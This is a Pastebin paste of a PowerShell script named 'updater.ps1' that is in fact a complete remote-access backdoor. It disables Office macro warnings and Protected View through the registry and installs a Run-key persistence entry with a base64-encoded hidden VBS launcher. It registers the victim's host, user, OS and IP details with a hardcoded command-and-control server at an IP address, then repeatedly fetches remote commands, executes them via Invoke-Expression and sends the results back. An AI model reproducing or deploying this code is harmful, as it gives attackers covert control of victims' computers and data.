opexxx

updater.ps1

Mar 9th, 2017
823
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $Excel = New-Object -ComObject Excel.Application
  2. $ExcelVersion = $Excel.Version
  3. for($i=10; $i -le 20; $i++){
  4. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force
  5. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force
  6. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  7. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  8. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  9. }
  10. for($i=10; $i -le 20; $i++){
  11. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force
  12. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force
  13. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  14. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  15. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  16. }
  17. New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Updater -PropertyType String -Value 'C:\Users\Public\Documents\conf.vbs' -Force
  18. $x='RGltIG9ialNoZWxsClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKY29tbWFuZCA9ICJwb3dlcnNoZWxsLmV4ZSAtV2luZG93U3R5bGUgaGlkZGVuIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1ub2xvZ28gLW5vcHJvZmlsZSAtZmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXFVwZGF0ZXIucHMxIgpvYmpTaGVsbC5SdW4gY29tbWFuZCwwClNldCBvYmpTaGVsbCA9IE5vdGhpbmcK'
  19. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x)) | Out-File C:\Users\Public\Documents\conf.vbs
  20.  
  21. $config = @{'api'= 'http://138.201.75.227/v2/'; 'storagePath'= 'C:\Users\Public\Documents'; 'chunkSize'=1024; 'retryCount'=2}
  22. function encode
  23. {
  24. param([string] $text)
  25. $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
  26. [Convert]::ToBase64String($bytes)
  27. }
  28.  
  29. function decode
  30. {
  31. param([string] $code)
  32. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code))
  33. }
  34.  
  35.  
  36. function getIps
  37. {
  38. $ips=""
  39. gwmi Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | where{$_.IPAddress[0] -NotLike '169*'} | % {$ips = $ips + "-"+ $_.IPAddress[0]}
  40. return $ips.subString(1)
  41. }
  42.  
  43. function eval
  44. {
  45. param([string] $expression)
  46. try {
  47. Invoke-Expression $expression
  48. } catch [System.SystemException] {
  49. return $false
  50. }
  51. }
  52.  
  53. function httpGet
  54. {
  55. param([string] $url)
  56. try {
  57. return (New-Object System.Net.WebClient).DownloadString("$($config['api'])$($url)")
  58. }
  59. catch [Net.WebException] {
  60. return $_.Exception.Message
  61. }
  62. }
  63.  
  64. function sendResult
  65. {
  66. param([string] $key, [string] $cmdId, [string]$result)
  67. $prefix = "?action=saveResult&id=$key&cmd=$cmdId"
  68. $chunks = [math]::floor($result.Length / $config['chunkSize'])
  69. if($chunks -eq 0){
  70. httpGet "$prefix&res=$result"
  71. }else{
  72. $counter = 0;
  73. for($j=0; $j -le $chunks; ++$j){
  74. $httpResult=''
  75. if($j -eq $chunks){
  76. $chunk = $result.Substring($j*$config['chunkSize'])
  77. $httpResult = httpGet "$prefix&chunk=last&res=$chunk"
  78. }else{
  79. $chunk = $result.Substring($j*$config['chunkSize'],$config['chunkSize'])
  80. $httpResult = httpGet "$prefix&chunk=$j&res=$chunk"
  81. }
  82. if($httpResult -eq 'OK'){continue}
  83. ++$counter
  84. --$j
  85. if($counter -ge $config['retryCount']){break}
  86. Start-Sleep -s 5
  87. }
  88. }
  89. }
  90.  
  91. function getKey
  92. {
  93. $keyPath = "$($config['storagePath'])\$($env:username).key"
  94. if((Test-Path $keyPath) -eq $true){
  95. $key = Get-Content $keyPath
  96. if($key -match "^\d+$"){
  97. return $key
  98. }
  99. }
  100. $os = (Get-WmiObject Win32_OperatingSystem).Name
  101. $os = $os.Split('{|}', [System.StringSplitOptions]::RemoveEmptyEntries)
  102. $os ="$((Get-WmiObject Win32_OperatingSystem).OSArchitecture)|$((Get-WmiObject Win32_OperatingSystem).Version)|$($os[0])|$($os[1])"
  103. $data = "$($env:computername)::$($env:username)::$($os)::$(getIPs)"
  104. $data = encode $data
  105. $id = httpGet "?action=register&data=$($data)"
  106. if($id.Length -gt 0){
  107. if($id -match "^\d+$"){
  108. Set-Content $keyPath $id
  109. return $id
  110. }
  111. }
  112. return $false
  113. }
  114.  
  115. function getCommand($key)
  116. {
  117. $commands = httpGet -url "?action=getCommand&id=$key"
  118. if($commands.Length -gt 4){
  119. $parts = $commands.Split('{::}', [System.StringSplitOptions]::RemoveEmptyEntries)
  120. $id = $parts[0]
  121. $cmd = decode $parts[1]
  122. $res = ((eval $cmd) | Out-String)
  123. $res = $res -replace ' {4,}', ' '
  124. $res = $res -replace '\-{4,}', '----'
  125. $res = encode $res
  126. sendResult $key $id $res
  127. return $true
  128. }
  129. return $false
  130. }
  131.  
  132.  
  133. while($true){
  134. $key = getKey
  135. if($key -eq $false){start-sleep -Seconds 120}
  136. else{break}
  137. }
  138. while ($true){
  139. getCommand $key
  140. start-sleep -Seconds 120
  141. }
RAW Paste Data